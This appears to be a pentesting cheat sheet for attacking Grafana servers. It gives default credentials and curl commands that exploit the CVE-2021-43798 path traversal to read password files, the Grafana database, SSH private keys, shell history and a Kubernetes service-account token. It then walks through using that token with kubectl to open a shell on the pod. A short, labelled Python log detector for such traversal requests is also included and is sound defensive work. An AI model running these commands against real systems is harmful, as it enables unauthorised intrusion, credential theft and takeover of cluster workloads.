# Grafana Pentesting

Grafana is a multi-platform analytics and interactive visualization web application.

### Default Credential

```shellscript
admin:admin
admin:prom-operator
```

### Configuration File

The configuration file contains the admin credentials. See the `admin_user` and `admin_password` settings in the file.

```shellscript
/etc/grafana/grafana.ini
```

### Path Traversal

```shellscript
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../etc/passwd -o passwd
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../etc/grafana/grafana.ini -o grafana.ini
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../root/.ssh/id_rsa
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../root/.bash_history
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../home/grafana/.ssh/id_rsa
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../home/grafana/.bash_history
```
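For detection, the requests above leave a recognisable pattern in HTTP access logs: a `/public/plugins/<plugin-id>/` path that resolves outside the plugin directory. The following is an added example, not part of the original notes. The log lines are constructed, and the combined log format (as written by a reverse proxy in front of Grafana) is an assumption.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed sample lines in combined log format (assumption: a reverse proxy
# in front of Grafana logs requests this way; adapt LINE_RE to your format).
SAMPLE_LOG = """\
10.0.0.5 - - [07/Dec/2021:10:01:02 +0000] "GET /public/plugins/alertlist/module.js HTTP/1.1" 200 5120
10.0.0.9 - - [07/Dec/2021:10:01:07 +0000] "GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1" 200 1370
10.0.0.9 - - [07/Dec/2021:10:01:09 +0000] "GET /public/plugins/alertlist/%2e%2e/%2e%2e/%2e%2e/etc/grafana/grafana.ini HTTP/1.1" 400 0
10.0.0.7 - - [07/Dec/2021:10:02:00 +0000] "GET /api/dashboards/home HTTP/1.1" 200 845
10.0.0.9 - - [07/Dec/2021:10:02:30 +0000] "GET /public/plugins/alertlist/%252e%252e/%252e%252e/var/lib/grafana/grafana.db HTTP/1.1" 404 0
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
PLUGIN_PREFIX = "/public/plugins/"

def decode_fully(path, max_rounds=3):
    """Percent-decode repeatedly so %2e%2e and %252e%252e are also caught."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def is_plugin_traversal(target):
    """True if a /public/plugins/<id>/ request resolves outside that plugin directory."""
    path = decode_fully(target.split("?", 1)[0]).replace("\\", "/")
    if not path.startswith(PLUGIN_PREFIX):
        return False
    plugin_id, _, rest = path[len(PLUGIN_PREFIX):].partition("/")
    if not plugin_id or ".." not in rest.split("/"):
        return False
    base = PLUGIN_PREFIX + plugin_id
    resolved = posixpath.normpath(posixpath.join(base, rest))
    return resolved != base and not resolved.startswith(base + "/")

def find_traversal_attempts(log_text):
    """Return (client_ip, status, raw_target) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and is_plugin_traversal(m["target"]):
            hits.append((m["ip"], int(m["status"]), m["target"]))
    return hits

if __name__ == "__main__":
    for ip, status, target in find_traversal_attempts(SAMPLE_LOG):
        print("SERVED" if status == 200 else "attempt", ip, status, target)
```

A hit with status 200 means the file was served, so any credentials, keys or tokens in it should be rotated.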

### Getting a Shell via JWT, Grafana Pod

Some Grafana versions are vulnerable to path traversal. Kubernetes creates environment variables for services in each pod by default.

#### 1. Check Environment Variables on the Target Machine

```shellscript
env
```

If you see GRAFANA environment variables like the following, the Grafana service is running on the cluster.

```
GRAFANA_SERVICE_HOST=10.108.133.228
GRAFANA_PORT=tcp://10.108.133.228:3000
GRAFANA_PORT_3000_TCP=tcp://10.108.133.228:3000
```

#### 2. Access the Grafana Dashboard

You can access the service at `http://<grafana-ip>:<grafana-port>`.

#### 3. Get the JWT of the Service Account

Use the path traversal ([CVE-2021-43798](https://github.com/jas502n/Grafana-CVE-2021-43798)) to read files.

```shellscript
curl --path-as-is http://<grafana-ip>:<grafana-port>/public/plugins/alertlist/../../../../../../../../etc/passwd
```

Get the token (JWT) of the service account.

```shellscript
curl --path-as-is http://grafana:3000/public/plugins/alertlist/../../../../../../../../var/run/secrets/kubernetes.io/serviceaccount/token
```

#### 4. Decode the JWT and Get Sensitive Information

See [**JWT Pentesting**](https://exploit-notes.hdks.org/exploit/web/jwt/).

#### 5. Check Your Permission of This Service

Using the JWT, check which permissions the service account has.

```shellscript
kubectl auth can-i --list --token=<Grafana-JWT>

# List pods
kubectl get pods --token=<JWT>
```

#### 6. Get a Shell on the Grafana Pod

```shellscript
kubectl exec -it <grafana-pod-name> --token=<Grafana-JWT> -- /bin/bash
```
